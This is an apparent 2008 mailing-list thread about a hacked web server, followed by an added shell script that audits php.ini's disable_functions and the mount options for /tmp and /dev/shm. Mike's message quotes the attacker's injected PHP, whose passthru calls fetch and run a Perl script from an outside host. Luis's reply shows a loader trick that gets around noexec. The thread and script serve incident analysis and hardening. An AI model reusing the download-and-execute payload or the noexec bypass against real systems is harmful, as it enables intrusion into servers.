Hi Luis

You are absolutely right!! Just tried a test script at /tmp, it is running. So there is not much point to mount /tmp and /dev/shm as non-exec. My misunderstanding of non-exec has been there for a while. :(

Thanks a lot.

Mike

On Jan 3, 2008 8:55 PM, Luis Mondesi <[EMAIL PROTECTED]> wrote:
> On Jan 3, 2008 6:18 PM, Mike Wang <[EMAIL PROTECTED]> wrote:
> > Hi folks
> [snip]
> > http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
> > passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt >
> > bb.txt;perl bb.txt;rm -f bb.txt*');
> > passthru('id');
> > ?>
> >
> > the /tmp was mounted as rw,noexec,nosuid, so it cannot run.
>
> nope. See below.
>
> > but not the /dev/shm, so the hacked script downloaded to /dev/shm, and ran
> > from there.
> >
> > what kind of applications are using /dev/shm? I googled around, and didn't seem to find
> > much information.
> > right now I mount it as rw,noexec,nosuid.
>
> A lot of stuff does. /dev/shm is recommended by LSB if I'm not
> mistaken. I know a few apps which use this (including my own).
>
> Well done tracking this script kiddie.
>
> This is a very stupid hack.
>
> By the way, noexec doesn't buy you anything here. perl bb.txt
> should've worked no matter if /tmp is exec or not. The way I see it
> they both worked (/tmp and /dev/shm). And besides, noexec can't even
> stop executables anyway. That's the stupidest of flags for mount:
>
> $> /lib/ld-linux.so.2 /usr/bin/printf "%s\n" foo
> foo
>
> And don't even think of making /lib/ld-linux.so.2 non-exec or
> something else... Your system will just break in a million pieces ;-)
>
> It's time to tell PHP (via php.ini) not to allow any of those
> functions that allow executing stuff from the system (system,
> passthru, whatever).
>
> Also, you might want to consider using Virtual Servers (Linux VServer,
> Xen, vmware, etc).
>
> Hack me once, shame on you. Hack me any other time with the same
> stupid attack vector, shame on me.
>
> Good that you took time to report this.
>
>
> --
> ----)(-----
> Luis Mondesi
> Maestro Debiano
>
> ----- START ENCRYPTED BLOCK (Triple-ROT13) ------
> Gur Hohagh [Yvahk] qvfgevohgvba oevatf gur fcvevg bs Hohagh gb gur
> fbsgjner jbeyq.
> ----- END ENCRYPTED BLOCK (Triple-ROT13) ------

--
Best Regards
Mike

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
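Luis's two points, that noexec on /tmp and /dev/shm does not stop `perl bb.txt` (the interpreter is executable elsewhere) and that the real fix is php.ini's `disable_functions`, can be turned into a quick audit. The script below is an added example, not code from the thread or from Debian: it parses a php.ini fragment and reports which of PHP's process-spawning functions (`system`, `passthru`, `exec`, `shell_exec`, `popen`, `proc_open`; the last four are real PHP functions not named in the thread) are still enabled, and it checks /proc/mounts-style lines for the noexec and nosuid options on a mount point. The php.ini and mount lines are constructed samples embedded in the script; point the functions at `$(cat /etc/php*/apache2/php.ini)` and `$(cat /proc/mounts)` on a real box.

```shell
#!/bin/sh
# Added example (not from the mailing-list thread): audit php.ini's
# disable_functions directive and mount options for /tmp and /dev/shm.
# The samples below are constructed for the demonstration.

# PHP functions that hand a string to the shell or spawn a process.
# system and passthru are the ones the thread names; the rest are the
# other standard PHP process-spawning functions.
SPAWN_FUNCS="system passthru exec shell_exec popen proc_open"

# missing_disabled INI_TEXT
#   Prints, space-separated, the SPAWN_FUNCS that are NOT listed in the
#   last effective disable_functions line of INI_TEXT (empty if all are).
missing_disabled() {
    ini="$1"
    disabled=$(printf '%s\n' "$ini" \
        | grep -E '^[[:space:]]*disable_functions[[:space:]]*=' \
        | tail -n 1 \
        | sed -e 's/^[^=]*=//' -e 's/[[:space:]"]//g' \
        | tr ',' ' ')
    missing=""
    for f in $SPAWN_FUNCS; do
        found=0
        for d in $disabled; do
            if [ "$d" = "$f" ]; then found=1; fi
        done
        if [ "$found" -eq 0 ]; then missing="$missing $f"; fi
    done
    printf '%s\n' "${missing# }"
}

# mount_missing MOUNTS_TEXT MOUNTPOINT
#   Prints which of noexec/nosuid are absent from the mount options of
#   MOUNTPOINT in /proc/mounts-formatted MOUNTS_TEXT. Note, as Luis says,
#   that noexec does not stop "perl script.txt"; this only reports the flag.
mount_missing() {
    mounts="$1"; mp="$2"
    opts=$(printf '%s\n' "$mounts" | awk -v mp="$mp" '$2 == mp { o = $4 } END { print o }')
    missing=""
    for want in noexec nosuid; do
        case ",$opts," in
            *,"$want",*) ;;
            *) missing="$missing $want" ;;
        esac
    done
    printf '%s\n' "${missing# }"
}

# Constructed php.ini fragments: the weak one disables only what the
# thread mentions, the hardened one disables every spawning function.
WEAK_INI='; constructed sample php.ini fragment
disable_functions = system,passthru'
HARDENED_INI='; constructed sample php.ini fragment
disable_functions = "system, passthru, exec, shell_exec, popen, proc_open"'

# Constructed /proc/mounts lines matching the thread: /tmp has noexec,nosuid,
# /dev/shm does not.
SAMPLE_MOUNTS='tmpfs /tmp tmpfs rw,noexec,nosuid,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,relatime 0 0'

if [ "${1:-}" = "--demo" ]; then
    echo "weak php.ini still allows:     $(missing_disabled "$WEAK_INI")"
    echo "hardened php.ini still allows: $(missing_disabled "$HARDENED_INI")"
    echo "/tmp lacks:     $(mount_missing "$SAMPLE_MOUNTS" /tmp)"
    echo "/dev/shm lacks: $(mount_missing "$SAMPLE_MOUNTS" /dev/shm)"
fi
```

Run it with `--demo` to see the report on the constructed samples. Quoted and space-padded disable_functions values are accepted because the sed step strips both before the comma split, and only the last disable_functions line counts, which is how PHP itself resolves a repeated directive.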